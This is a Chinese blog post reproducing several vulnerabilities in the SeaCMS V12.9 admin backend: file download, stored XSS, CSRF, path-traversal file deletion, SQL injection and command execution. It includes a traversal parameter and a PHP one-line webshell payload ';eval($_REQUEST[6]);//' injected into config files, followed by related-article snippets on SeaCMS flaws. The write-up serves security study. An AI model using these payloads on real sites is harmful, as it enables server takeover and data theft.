Seacms V12.9

已于 2022-06-18 14:19:57 修改
阅读量1k 收藏 1
点赞数
文章标签: p2p 网络协议 网络
于 2022-06-18 14:15:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65219040/article/details/125346144
版权

任意文件下载:

代码审计:

通过定位file_get_contents()函数:

找寻有可控变量的文件:

后台文件/n5y4um/admin_safe.php,代码94行。

 

 漏洞复现:

进入后台这个页面:

XSS:

因为已经登入后台,所以找存储型的XSS,在扩展中添加广告,友情链接这些地方进行尝试:

直接修改海洋cms名称,拼接js, 

存储型XSS: 前台页面:

 CSRF:

尝试添加系统管理员:

 

构造poc: 在另一浏览器打开:

 

任意文件删除

代码审计: 

 网页打开admin_template.php,添加参数action=del&filedir=../templets/default/html/../../../test.php。设置打开这个网页就进行自动断点。在 admin_template.php进行跟踪:

 未对删除目录路径进行严格的过滤,会存在路径穿越进行删除任意文件。

漏洞复现:

在后台模板页面

点击下一级目录。 自己在根目录添加一个test.php文件,将最后的文件名改为根目录下自己创建的文件路径。

发现根目录下自己设置的test.php文件删除成功。说明存在任意文件删除漏洞。

页面上显示的内容为根目录下的文件。会返回抓包修改的的路径。

命令执行:

在后台百度推送页面: 

进入这个文件查看: 向上查看这两个参数:打开/data/admin/ping.php文件:

 打开/data/admin/ping.php文件:

所以页面中插入一句话木马:";eval($_REQUEST[6]);//

查看文件中代码:

访问这个页面:

连接蚁剑即可。

命令执行2:

在后台用户-->会员消息通知: 

 成功保存之后:

去文件中查看出现的问题: 

 

再次尝试 ";eval($_REQUEST[6]);// : 

木马上传成功:

 访问这个文件:

 

SQL注入:

代码审计 

在/后台文件夹/admin_comment_news.php文件。

追踪这两个函数:

未发现进行过滤,存在SQL注入。 

young lady
关注
海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)
0xSec
06-12 860
海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
seacms海洋cms影视管理系统 v9.1.zip
07-07
seacms海洋cms影视管理系统 v9.1 更新日志 更新日期:2019年2月1日 v9.1 优化:服务器开启OPcache时后台设置兼容性 优化:视频编辑时剧情分类显示方式 优化:剧情分类缓存项 seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。 seacms海洋影视管理系统前台页面 seacms海洋影视管理系统后台管理 后台路径:域名//admin 用户名与密码:admin(安装时可设置) 后台页面:  相关阅读 同类推荐:站长常用源码
SeaCMS海洋影视管理系统远程代码执行漏洞复现
holyxp的博客
07-27 760
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
SeaCMS海洋影视管理系统 index.php SQL注入
最新发布
iSee857的博客
08-24 389
海洋CMS是一套专为不同需求的站长而设计的内容管理系统,灵活、方便、人性化设计、简单易用是最大的特色,可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发,完全开源免费 、无任何加密代码。在index.php中存在SQL注入,导致未授权攻击者可利用该漏洞获取隐私数据。该漏洞已支持yakit插件检测,根据uuid 1ab73e21-fc16-4801-9588-3bbae2ad1418 进行下载。在Web应用防火墙中添加接口临时黑名单规则。
seacms海洋cms漏洞
YouthBelief的博客
10-29 5838
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
seacms_v6.56
04-08
海洋cms 不错的CMS 前后台可编辑。一键部署,可二次开发
seacms海洋影视管理系统 v6.53
11-29
seacms海洋影视管理系统 v6.53 更新日志 新增:微信公众平台模块优化:采集逻辑修复:部分文字描述错误 seacms海洋影视管理系统简介 海洋影视管理系统 (seacms,海洋cms)是一套专为不同
海洋影视管理系统seacms 12.9
04-30
海洋影视管理系统seacms 12.9 更新日志:2021-01-18新增:采集时标题替换;新增:后台影片购买记录;新增:后台会员组购买记录;新增:前台充值记录记录;新增:前台会员组购买记录;优化:发送用户消息逻辑;优化:部分...
seacms-v12.9.20231019.zip
05-28
最新版本:V12.9(2024-4-20) / 运行环境:PHP(5.x/7.x) + MySQL/MariaDB 领先的底层技术 摸爬滚打多年,海洋CMS有着丰富的经验和技术积累,并且能够随着流行趋势加入更多当下流行的功能。 丰富的系统标签 海洋CMS...
海洋cms(海洋视频内容管理系统) v12.9 bulid20231019.zip
04-02
v12.9 build20231019是该系统的最新版本,发布于2023年10月19日,包含一系列的改进和更新,以提升用户体验和系统性能。 一、系统特性 1. 视频管理:海洋CMS提供了完善的视频上传、分类、排序和推荐功能。管理员可以...
seacms6.53源码
10-11
是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。
今客CRM客户关系管理系统 v12.9
09-30
《今客CRM客户关系管理系统 v12.9:企业高效管理的得力助手》 在当今竞争激烈的商业环境中,有效的客户关系管理(CRM)成为企业不可或缺的重要工具。今客CRM客户关系管理系统 v12.9正是针对这一需求,为企业提供了...
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1741
seaCms-命令执行】后门代码写入可解析文件中
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026)
weixin_43167326的博客
05-10 586
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!! CVE-2024-26026是BIG-IP Next Central Manager中的SQL注入漏洞。未经身份验证的远程攻击者可以通过向易受攻击的Next Central Manager API端点发送
SeaCMS远程命令执行(CNVD-2020-22721)
m0_65150886的博客
02-21 489
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
SeaCms(海洋CMS)采集插件教程
zhugedz的博客
05-21 322
资源库地址:http://www.xxx.vip/api.php/provide/vod/at/xml/?ac=list 点击【增加】按钮即可,具体操作如下图。请按以下步骤进行:依次点击【采集】-【资源库管理】,然后依次输入 资源库名称:某某资源。
seacms 远程命令执行 (CNVD-2020-22721)
小小猪的博客
12-30 2333
seacms 远程命令执行 (CNVD-2020-22721) 漏洞简介: 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 环境搭建: 登录后台,账号admin,密码admin 访问后台IP安全设置网页 burp进行抓包,后面拼接一句话命名 POST /manager/ad..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值